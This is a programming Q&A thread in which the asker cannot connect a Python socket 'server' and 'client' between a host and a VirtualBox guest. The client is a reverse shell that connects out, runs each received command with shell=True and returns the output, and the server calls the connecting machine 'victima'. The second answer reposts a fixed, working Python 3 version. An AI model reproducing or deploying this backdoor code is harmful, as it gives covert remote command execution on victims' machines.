# Python socket refused virtualbox and host machine

Tags: python, sockets, python-3.7

Good morning, I have a problem with the socket when using two machines within the same network (on the same machine it does work)

I have assigned the ip of the server in the client script and the server, I have disabled the firewall on both computers and when I execute the client, it receives the connection but closes it, it has something to do with web firewall? I leave you a picture here:
[image]

Server:

```
#!/usr/bin/env python
#_*_ coding: utf8 _*_

import socket

def main():
    server = socket.socket()
    server.bind(('192.168.1.33',7777))
    server.listen(1)

    while True:
        victima,direccion = server.accept()
        print("Conexion de: {}".format(direccion))

        ver = victima.recv(1024)

        if ver == "1":
            while True:
                opcion = raw_input("shell@shell: ")
                victima.send(opcion)
                resultado = victima.recv(2048)
                print(resultado)

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        exit()
```

Client:

```
#!/usr/bin/env python
#_*_ coding: utf8 _*_

import socket
import subprocess

cliente = socket.socket()

try:
    cliente.connect(('192.168.1.33',7777))
    cliente.send("1")

    while True:
        c = cliente.recv(1024)
        comando = subprocess.Popen(c,shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
        cliente.send(comando.stdout.read())
except:
    pass
```

Comment: Please post code and results as text rather that a screenshot.  it's easier for us all to read, and it lets us respond with references to parts of your code, and with modifications to it.

Comment: @Steve code updated

Answer (score 0):

I don't know whether you changed your virtualbox settings or not, but thing about VMs is that they are not your machine; by that I mean you are simulating another "pc" running into your physical one, so they are to be considered like two different computers, but when you connect to a network, usually ( Default option ), the VM uses the physical connection ( the one of your pc ) to work on the net. While if you use the server script and the client one without VM your network card figures it out ( same mac address, same ip, same net, etc. ) **with the VM you should check the settings of your simulation software ( Virtual box ) to see which kind of behaviour is set to be the default one**.

I've found my self more comfortable with the VMPlayer interface than the Virtual Box one, but either way in the network settings you can choose if exploit the physical connection already opened ( simulates an ethernet conneciton ) or "duplicate" the connection ( The latter is usually used to connect an external network card ).

Not pretty sure what you were asking, if the technical explanation of why it doesn't work, or a workaround to make it work so... here it is. By the way, if you want to try to change configuration to your modem settings to see if that was the problem, go to 192.168.1.1 and open the port you've choosen for the protocol you'vee choosen to work with ( I see port 7777 and TCP ).

Cheers

Comment: Here, take a look at this, (https://www.virtualbox.org/manual/ch06.html#network_bridged) , it explains the differences ( though it's a bit detailed, so feel free to skip some part ); I'd  proceed this way: Try changing router ports ( the 192.168.1.1 thing,don't think it's the problem, but the easiest to try); Try playing with the net options of your VM ( to see local ip on windows ipconfig, on linux ifconfig ), so change the ip accordingly. Keep in mind that when you virtualize it's as if you were not on the same machine anymore.

Answer (score 0):

To fix that, i have to encode and decode data and change raw_input() to input() if u are using python 3

Server

```
#!/usr/bin/env python
#_*_ coding: utf8 _*_

import socket

def main():
    server = socket.socket()
    server.bind(('192.168.1.44',8000))
    server.listen(1)

    while True:
        victima,direccion = server.accept()
        print("Conexion de: {}".format(direccion))

        ver = victima.recv(1024).decode('utf-8')

        if ver == "1":
            while True:
                opcion = input("shell@shell: ")
                victima.send(opcion.encode('utf-8'))
                resultado = victima.recv(2048).decode('utf-8')
                print(resultado)

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        exit()
```

Client

```
#!/usr/bin/env python
#_*_ coding: utf8 _*_

import socket
import subprocess

cliente = socket.socket()

try:
    cliente.connect(('192.168.1.44',8000))
    cliente.send("1".encode('utf-8'))

    while True:
        c = cliente.recv(1024).decode('utf-8')
        comando = subprocess.Popen(c,shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
        cliente.send(comando.stdout.read())
except:
    pass
```